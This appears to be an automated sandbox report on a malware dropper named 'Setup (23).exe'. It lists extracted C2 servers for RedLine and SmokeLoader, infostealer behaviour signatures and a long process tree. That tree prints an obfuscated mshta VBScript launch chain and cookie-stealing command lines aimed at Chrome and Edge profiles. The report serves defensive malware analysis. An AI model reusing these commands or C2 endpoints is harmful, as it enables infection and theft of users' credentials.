Resubmissions
11-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 1029-08-2021 11:37
210829-18htk4slyj 1028-08-2021 23:10
210828-rt8b9gzxn6 1028-08-2021 22:59
210828-zxgnh5j4w6 1028-08-2021 11:31
210828-xrjs66aknj 10Analysis
-
max time kernel
177s -
max time network
1806s -
platform
windows11_x64 -
resource
win11 -
submitted
22-08-2021 21:19
General
-
Target
Setup (23).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
v1
C2
195.2.78.163:25450
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
Blocklisted process makes network request 63 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 34 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 14 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 10 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 34 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 4 IoCs
-
Modifies system certificate store 2 TTPs 16 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (23).exe"C:\Users\Admin\AppData\Local\Temp\Setup (23).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\R48SBawdw4kU2e3s24vQ9vKp.exe"C:\Users\Admin\Documents\R48SBawdw4kU2e3s24vQ9vKp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5117462.exe"C:\Users\Admin\AppData\Roaming\5117462.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3240 -s 23724⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\4314784.exe"C:\Users\Admin\AppData\Roaming\4314784.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1698112.exe"C:\Users\Admin\AppData\Roaming\1698112.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 24324⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\4567926.exe"C:\Users\Admin\AppData\Roaming\4567926.exe"3⤵
-
C:\Users\Admin\Documents\jzqLRNKxsW5y58WxDLJ15wdL.exe"C:\Users\Admin\Documents\jzqLRNKxsW5y58WxDLJ15wdL.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\tBuxxjdx3FQngk1Pt0BNUH5Y.exe"C:\Users\Admin\Documents\tBuxxjdx3FQngk1Pt0BNUH5Y.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exe"C:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exeC:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\aJMLnmQHOOAbNwuvxX0WFUlP.exe"C:\Users\Admin\Documents\aJMLnmQHOOAbNwuvxX0WFUlP.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\cpYpXTmmGiVSfBxcmE4nmCJO.exe"C:\Users\Admin\Documents\cpYpXTmmGiVSfBxcmE4nmCJO.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\6S8PC6C5tJoFcljGQp9kreGW.exe"C:\Users\Admin\Documents\6S8PC6C5tJoFcljGQp9kreGW.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 2763⤵
- Program crash
-
C:\Users\Admin\Documents\pUCb0lk9nvctQdKX6B8_P_YK.exe"C:\Users\Admin\Documents\pUCb0lk9nvctQdKX6B8_P_YK.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\bAucNMKwZIo8Up8zd6J7f86P.exe"C:\Users\Admin\Documents\bAucNMKwZIo8Up8zd6J7f86P.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\8gCtyzKiuV26HitQGRIDgMky.exe"C:\Users\Admin\Documents\8gCtyzKiuV26HitQGRIDgMky.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe" ) do taskkill -f -iM "%~NxA"4⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "WR_xJSW9pvYhMRpqACQX849F.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Puh3U9f2ULtxULhWwIAxCX_P.exe"C:\Users\Admin\Documents\Puh3U9f2ULtxULhWwIAxCX_P.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1184 -s 2963⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exe"C:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exeC:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\y3G80bY_xpeZZELV7e5mVaeo.exe"C:\Users\Admin\Documents\y3G80bY_xpeZZELV7e5mVaeo.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9OAqGXBQoEIoTFvnhCrrS_8K.exe"C:\Users\Admin\Documents\9OAqGXBQoEIoTFvnhCrrS_8K.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\dRr5YCEL2pEwYSdyHRVBS24P.exe"C:\Users\Admin\Documents\dRr5YCEL2pEwYSdyHRVBS24P.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 3163⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exe"C:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exeC:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\nwNWAGGe6qABLrLg77MXYuML.exe"C:\Users\Admin\Documents\nwNWAGGe6qABLrLg77MXYuML.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\7cKS46ic5W_306jW2SkqNqpe.exe"C:\Users\Admin\Documents\7cKS46ic5W_306jW2SkqNqpe.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe"C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe"C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe" -q3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\CvQGavEp4ZKX4jPB6ErPbq71.exe"C:\Users\Admin\Documents\CvQGavEp4ZKX4jPB6ErPbq71.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\es5ovX9j2BEakidcJiPB_DUG.exe"C:\Users\Admin\Documents\es5ovX9j2BEakidcJiPB_DUG.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 2563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\EDoeZ1vpsO0rSv93ax3a75Zn.exe"C:\Users\Admin\Documents\EDoeZ1vpsO0rSv93ax3a75Zn.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\QskiAnEpGnt8O2yQkwAjT6FB.exe"C:\Users\Admin\Documents\QskiAnEpGnt8O2yQkwAjT6FB.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-NRH69.tmp\QskiAnEpGnt8O2yQkwAjT6FB.tmp"C:\Users\Admin\AppData\Local\Temp\is-NRH69.tmp\QskiAnEpGnt8O2yQkwAjT6FB.tmp" /SL5="$202BC,138429,56832,C:\Users\Admin\Documents\QskiAnEpGnt8O2yQkwAjT6FB.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-SGG04.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SGG04.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 2966⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-GHPPK.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-GHPPK.tmp\WEATHER Manager.tmp" /SL5="$1036A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 18886⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7153870.exe"C:\Users\Admin\AppData\Roaming\7153870.exe"6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5316 -s 23047⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\3533583.exe"C:\Users\Admin\AppData\Roaming\3533583.exe"6⤵
